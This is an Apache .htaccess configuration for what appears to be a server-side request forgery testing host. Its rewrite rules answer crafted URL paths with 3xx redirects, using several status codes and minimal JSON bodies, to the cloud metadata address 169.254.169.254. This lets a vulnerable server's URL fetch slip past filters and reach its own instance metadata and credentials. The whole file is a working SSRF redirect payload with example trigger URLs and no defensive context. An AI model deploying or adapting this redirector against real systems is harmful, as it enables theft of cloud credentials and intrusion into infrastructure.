# Set minimal json response body
ErrorDocument 300 '{"a":[{"b":"2","c":"3"}]}'
ErrorDocument 301 '{"a":[{"b":"2","c":"3"}]}'
ErrorDocument 302 '{"a":[{"b":"2","c":"3"}]}'
ErrorDocument 303 '{"a":[{"b":"2","c":"3"}]}'
ErrorDocument 305 '{"a":[{"b":"2","c":"3"}]}'
ErrorDocument 307 '{"a":[{"b":"2","c":"3"}]}'
ErrorDocument 308 '{"a":[{"b":"2","c":"3"}]}'

# 300 with response body
# https://ssrf.localdomain.pw/json-with-body-md/300-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/300-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 300-([^/-]*)-(.*).j.json$
RewriteRule 300-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=300,NC]

# 301 with response body
# https://ssrf.localdomain.pw/json-with-body-md/301-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/301-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 301-([^/-]*)-(.*).j.json$
RewriteRule 301-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=301,NC]

# 302 with response body
# https://ssrf.localdomain.pw/json-with-body-md/302-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/302-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 302-([^/-]*)-(.*).j.json$
RewriteRule 302-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=302,NC]

# 303 with response body
# https://ssrf.localdomain.pw/json-with-body-md/303-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/303-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 303-([^/-]*)-(.*).j.json$
RewriteRule 303-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=303,NC]

# 305 with response body
# https://ssrf.localdomain.pw/json-with-body-md/305-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/305-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 305-([^/-]*)-(.*).j.json$
RewriteRule 305-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=305,NC]

# 307 with response body
# https://ssrf.localdomain.pw/json-with-body-md/307-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/307-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 307-([^/-]*)-(.*).j.json$
RewriteRule 307-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=307,NC]

# 308 with response body
# https://ssrf.localdomain.pw/json-with-body-md/308-http-.j.json
# https://ssrf.localdomain.pw/json-with-body-md/308-http-test/.j.json
RewriteEngine on
RewriteCond %{REQUEST_URI} 308-([^/-]*)-(.*).j.json$
RewriteRule 308-([^/-]*)-(.*).j.json$ $1://169.254.169.254/$2 [L,R=308,NC]

# Always set the Content-Type header application/json
Header always set Content-Type application/json
# Always set Cache-Control to max-age=0, must-revalidate, no-cache, no-store, private
Header always set Cache-Control "max-age=0, must-revalidate, no-cache, no-store, private"
# Always set Pragma to no-cache
Header always set Pragma no-cache
